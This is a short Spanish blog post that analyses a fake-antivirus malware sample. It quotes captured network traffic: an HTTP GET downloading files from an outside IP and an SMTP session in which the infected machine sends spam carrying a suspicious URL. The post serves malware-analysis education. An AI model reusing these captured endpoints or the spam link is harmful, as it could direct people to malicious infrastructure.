Sabemos que existen distintas formas de distribución de malware, algunas por ejemplo con adjuntos de correo. Otras, con enlaces que nos encontramos en alguna página web, cosas que nos pasan por USB etc..
Una de las formas son los FAKE AV es decir, los que simulan ser un antivirus y en realidad no lo son. Estos antivirus muchas veces intentan simular una marca comercial de antivirus que la gente ya conoce para que sea mas fácil engañar al usuario.
Además de suplantar marca oficial de antivirus también juegan con la inexperiencia del usuario y simulan que el usuario está infectado.
Cuando el usuario visualiza este tipo de mensajes el pánico le hace el instalar malware en la máquina.
Otra opción que también es viable es que alojen malware en páginas que normalmente visitamos.
El artículo de hoy trata sobre que puede llegar a realizar un malware una vez que ha afectado nuestro sistema.
Al ejecutar el malware, primero analizamos que está realizando el malware en cuestión.
GET /CgbKbGODaYkp.htm HTTP/1.1Host: 89.72.159.120Content-Length: 5137User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; es-AR; rv:1.9) Gecko/2008051206 Firefox/3.0
Parece que nuestra máquina realiza una conexión a un servidor de fuera, y se descarga un archivo htm
Si hacemos la captura con Wireshark podemos directamente filtrar las peticiones GET
Obtiene tres archivos HTM de distintos servidores.
¿Que mas realiza este malware?
Si miramos podemos ver además peticiones SMTP, entre todas las que hay, he seleccionado una de ellas.
220 mx.google.com ESMTP u42si5077648weq.124HELO static-122-21-235-87.ipcom.comunitel.net250 mx.google.com at your serviceMAIL FROM:<ahnachris@verifone.com>250 2.1.0 OK u42si5077648weq.124RCPT TO:<hungtaydo@gmail.com>250 2.1.5 OK u42si5077648weq.124DATA354 Go ahead u42si5077648weq.124Received: from unknown (HELO zu3x) ([124.218.87.78]).by with ESMTP; Thu, 5 Apr 2012 10:47:54 -0800Message-ID: <002c01cd1354$24cf7a10$7cda574e@xpmalwarezu3x>From: “Rachel Rush” <ahnachris@verifone.com>To: <hungtaydo@gmail.com>Subject: To those who look for perfect healthDate: Thu, 5 Apr 2012 10:38:36 -0800MIME-Version: 1.0Content-Type: text/plain;.format=flowed;.charset=”windows-1250″;.reply-type=originalContent-Transfer-Encoding: 7bitX-Priority: 3X-MSMail-Priority: NormalX-Mailer: Microsoft Outlook Express 6.00.2800.1106X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106http://trayer.com/crowd.html Make her your toy250 2.0.0 OK 1333648044 u42si5077648weq.124QUIT221 2.0.0 closing connection u42si5077648weq.124QUIT
Vaya parece que se ha enviado un correo con una URL que contiene SPAM…
En el siguiente artículo miramos cosas mas interesantes de este malware
Saludos